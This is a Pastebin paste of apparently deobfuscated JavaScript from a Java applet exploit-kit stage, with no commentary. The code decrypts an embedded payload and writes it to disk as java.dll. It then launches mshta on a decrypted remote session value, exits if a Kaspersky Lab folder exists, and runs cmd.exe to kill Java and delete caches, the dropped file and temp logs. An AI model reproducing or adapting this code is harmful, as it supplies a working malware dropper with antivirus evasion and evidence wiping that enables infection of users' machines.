Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function main() {
- try {
- y = parseFloat(s.getProperty("winver.version")), f = s.getenv("temp"), a(), "" != m && (h = e(m)), r()
- } catch (t) {
- l()
- }
- }
- function a() {
- try {
- if (v) var a = t.gzrcb(t.rf("/d.dat"), applet.getParameter("adv"));
- else var a = t.gzrcb(t.rf("/com/d.dat"), applet.getParameter("adv"));
- var e = null;
- try {
- e = new File(s.getenv("allusersprofile"), "java.dll"), e.exists() || e.createNewFile()
- } catch (r) {
- e = null
- }
- null != e && e.canWrite() || (e = new File(f, "java.dll"));
- var l = new FileOutputStream(e);
- l.write(a, 0, a.length), l.close(), m = e.getAbsolutePath()
- } catch (r) {}
- }
- function e(a) {
- try {
- return payload.getClass().getConstructor(new Array(u)).newInstance(new Array(a)).success
- } catch (e) {
- return !1
- }
- }
- function r() {
- try {
- var a = applet.getParameter("adv"),
- e = !1;
- if (d = t.rc(t.h2b(applet.getParameter("session")), a), h && (e = payload.execute("mshta", d)), !h || !e) {
- y > 5.2 ? n(new File(i("%programdata%"), "Kaspersky Lab")) && s.exit(0) : n(new File(i("%allusersprofile%"), "Application Data\\Kaspersky Lab")) && s.exit(0);
- var r = new p;
- r.add("mshta"), r.add(d), java.lang.ProcessBuilder(r).start()
- }
- } catch (c) {} finally {
- l()
- }
- }
- function l() {
- try {
- var a = "";
- if (v ? (a = payload.getParameter("cache"), a.equals("null") && (a = "")) : a = s.getProperty("deployment.user.cachedir"), h) {
- var e = '/c taskkill /f /im java.exe & ping -n 3 127.1 & rmdir /q /s "' + a + '" & del /q /f "' + m + '" "%tmp%\\java2sw*" "%tmp%\\jar_cache*.tmp" "%tmp%\\update.log"';
- payload.shellexec(e)
- } else {
- y > 5.2 ? n(new File(i("%programdata%"), "Kaspersky Lab")) && s.exit(0) : n(new File(i("%allusersprofile%"), "Application Data\\Kaspersky Lab")) && s.exit(0);
- var t = new java.util.ArrayList;
- t.add("cmd.exe"), t.add('/c taskkill /f /im java.exe & ping -n 3 127.1 & rmdir /q /s "' + a + '" & del /q /f "%tmp%\\java2sw*" "%tmp%\\jar_cache*.tmp" "%tmp%\\update.log"'), java.lang.ProcessBuilder(t).start()
- }
- } catch (r) {} finally {
- s.exit(0)
- }
- }
- function n(a) {
- try {
- return null != a && a.exists() && !a["delete"]()
- } catch (e) {
- return !1
- }
- }
- function i(a) {
- try {
- if (0 == a.length) return null;
- var e = a.indexOf("%", 0);
- if (-1 == e) return a;
- var t = a.indexOf("%", e + 1);
- if (-1 == t) return null;
- var r = a.substring(e + 1, t),
- l = s.getenv(r);
- return null == l ? null : ("\\" == l[l.length - 1] && (l = l.substring(0, l.length - 1)), a.replace("%" + r + "%", l))
- } catch (n) {
- return null
- }
- }
- importPackage(java.io, java.net, java.util.zip), importClass(Packages.com.t);
- var s = java.lang.System,
- c = java.lang.reflect.Array.newInstance,
- p = java.util.ArrayList,
- u = java.lang.String,
- g = java.lang.Long,
- o = java.lang.Byte,
- d = "",
- m = "",
- y = 0,
- f = "",
- h = !1;
Add Comment
Please, Sign In to add comment